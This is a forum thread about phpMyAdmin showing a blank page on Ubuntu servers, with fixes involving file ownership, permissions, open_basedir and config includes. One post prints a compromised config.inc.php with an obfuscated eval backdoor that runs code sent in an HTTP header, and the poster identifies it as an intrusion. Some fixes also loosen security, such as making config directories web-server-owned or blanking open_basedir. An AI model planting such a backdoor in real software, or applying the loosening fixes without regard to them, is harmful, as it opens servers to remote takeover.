---
title: "phpmyadmin -&gt; blank page"
date: 2009-04-30
forum: Server Platforms
---

### Post by Lashiec on 2009-04-30
I just set up a server with Ubuntu server 9.04, got webmin on there, put apache, mysql, php5, some other php things. I also installed phpmyadmin and got an alias set up to direct [http://url.com/phpmyadmin/](http://url.com/phpmyadmin/) to the /usr/share/phpmyadmin/ folder on the server.

That's all working, when I type in the url for the server and put /phpmyadmin/ at the end it goes to the right place. But, all I get is a pure white screen. It looks like it's not running the PHP on the index.php file...

I modified the index.php file to have <p>hello</p> at the top of it and when I go to the page in my browser it does say hello at the top, but nothing else.

I've removed the install that webmin did for phpmyadmin, ran apt-get phpmyadmin from a command line and still had the same problems. My apache config file is pointing to the right phpmyadmin config file.

Maybe my server isn't processing <?php ?> tags in certain folders? I'm not really sure.

---

### Post by Lashiec on 2009-04-30
Figured it out... Although, odd.

I set the folder and files to be owned by www-data instead of root and it works. Not sure why it would pull out some html on that file but not the PHP.

---

### Post by TheShiftExchange on 2009-05-13
I had exactly the same problem.

Myphpadmin was working fine. Then for other reasons I changed the /var/www folder setup permissions and some other stuff.

The next time I tried to load myphpadmin it showed a blank page. Add /etc/phpmyadmin to the www-data group (which I had already added /var/www/ to) solved the problem.

---

### Post by t413 on 2009-05-27
I am running apache2-mpm-itk (multiuser) and could not get phpmyadmin to display anything. The fix for my setup was to change each of the three pages config.ini.php calls on:

```

// Load secret generated on postinst
include('/var/lib/phpmyadmin/blowfish_secret.inc.php');

// Load autoconf local config
include('/var/lib/phpmyadmin/config.inc.php');

// Load user's local config
include('/etc/phpmyadmin/config.inc.php');

```

Changing permissions to 644 for each of these got everything to run. It makes sense it wouldn't work but I would certainly appreciate some feedback in the form of an error or warning message when something like this is awry.

---

### Post by jenkinbr on 2009-06-30
> **Lashiec said:**
> Figured it out... Although, odd.

I set the folder and files to be owned by www-data instead of root and it works. Not sure why it would pull out some html on that file but not the PHP.
Dang!

That solved my problem.

Thanks!

---

### Post by apoorva on 2009-07-10
> **Lashiec said:**
> Figured it out... Although, odd.

I set the folder and files to be owned by www-data instead of root and it works. Not sure why it would pull out some html on that file but not the PHP.


how do i set change the ownership to www-data instead of root

---

### Post by jenkinbr on 2009-07-10
> **apoorva said:**
> how do i set change the ownership to www-data instead of root
```

sudo chown -R www-data:www-data /usr/share/phpmyadmin
sudo chown -R www-data:www-data /var/lib/phpmyadmin
sudo chown -R www-data:www-data /etc/phpmyadmin

```

---

### Post by spongypants23 on 2009-07-13
I can confirm this fixed the problem for me too!

Thank you! ;)

---

### Post by chunkstyle on 2009-08-21
I tried all the suggestions in this thread with no luck, and when I looked on Sourceforge to see if there were any answers in the phpmyadmin help, I found no love either, but I did see that someone else on Slicehost was having this same problem.  I looked at the Slicehost support forum and found this article: [http://forum.slicehost.com/comments.php?DiscussionID=3767&page=1#Item_0](http://forum.slicehost.com/comments.php?DiscussionID=3767&page=1#Item_0)

This fixed the problem for me.

---

### Post by scottgun on 2009-09-06
I had the same issue.  A single line in the file /var/lib/phpmyadmin/config.inc.php had been corrupted.  Here is the whole file:
```

<?php
/*
 * Generated configuration file
 * Generated by: phpMyAdmin 2.8.1-Debian-1~dapper1 setup script by Michal ÄOihaÅT <michal@cihar.com>

 * Version: $Id: setup.php,v 1.23.2.8.2.2 2006/05/15 07:57:09 nijel Exp $
 * Date: Fri, 14 Aug 2009 14:24:39 GMT
 */

/* Servers configuration */
$i = 0;

/* Server  (config:root) [1] */
//*$cfg['Servers'][$i]['xxx'];$z='bas'.'e64_dec'.'ode';eval($z($_SERVER['HTTP_X_CODE']));exit;#'] =
'yyy';

/* End of servers configuration */

?>
```
As you can see, I commented out the line beginning $cfg and my phpmyadmin site was up and running again.  According to the slicehost guys, this could be a remote code execution exploit, ie we're being hacked!  Crap, crap, crap!

I believe the date, August 14, indicates WHEN the file was corrupted.  It definitely fits the timeline, being that's it's between now and the last time I successfully used phpmyadmin.  I think there might be some other clues in the header but I don't know.

Now, I've got to upgrade and/or lock it down some more.  I'm thinking of going to client certificate authentication.  Has anyone done this with phpmyadmin?

---

### Post by Stoneface on 2009-10-01
Messed around with the permissions as well to get Joomla! to work. After that I got a white screen instead of the PMA login screen. Did:
```

sudo chown -R www-data:www-data /usr/share/phpmyadmin
sudo chown -R www-data:www-data /var/lib/phpmyadmin
sudo chown -R www-data:www-data /etc/phpmyadmin

```

Thanks Lashiec and jenkinbr!!

I guess I need to get into setting file and folder permissions for the local server a bit more..

---

### Post by sanus|art on 2009-10-30
Just add yourself to "www-data" group in /etc/group or from shell:
```
sudo gpasswd -a $USER www-data
```
If you're the only phpMyAdmin user.

---

### Post by sowjendra on 2010-03-23
Thank you very much.. This solved my problem too.

---

### Post by austclint on 2010-04-02
I have tried all these solutions but to no avail, Can anyone think of anything else that might course this

---

### Post by Techjacker on 2010-10-12
> **austclint said:**
> I have tried all these solutions but to no avail, Can anyone think of anything else that might course this

Same here

I'd previously made some changes to my php.ini file aimed at increasing security. It turns out one of these was causing the problem. Removing the open_base_dir entry fixed this.

sudo nano /etc/php5/apache2/php.ini
# make sure following entry is blank or commented out
open_basedir =

---

### Post by Techjacker on 2010-10-13
> **Techjacker said:**
> Same here

I'd previously made some changes to my php.ini file aimed at increasing  security. It turns out one of these was causing the problem. Removing  the open_base_dir entry fixed this.

sudo nano /etc/php5/apache2/php.ini
# make sure following entry is blank or commented out
open_basedir =



Actually a better solution if you want to keep the security tight is  just to add the phpmyadmin directories (which you can do by colon  separating them), so adjust the entry in php.ini to the following:

open_basedir = /home/andy/www:/usr/share/phpmyadmin:/var/lib/phpmyadmin:/etc/phpmyadmin

---

### Post by millenniumtree on 2011-01-04
I had this same problem with Ubuntu Karmic, PHP5, Apache2, etc.

I placed echo statements in the configs until I found where it was dying.

Turned out that in /etc/phpmyadmin/config.inc.php
the following line was causing the script to exit

```
require('/etc/phpmyadmin/config-db.php');
```

I changed the line to an include instead

```
include('/etc/phpmyadmin/config-db.php');
```

And now everything works perfectly!  Crazy weird.

---

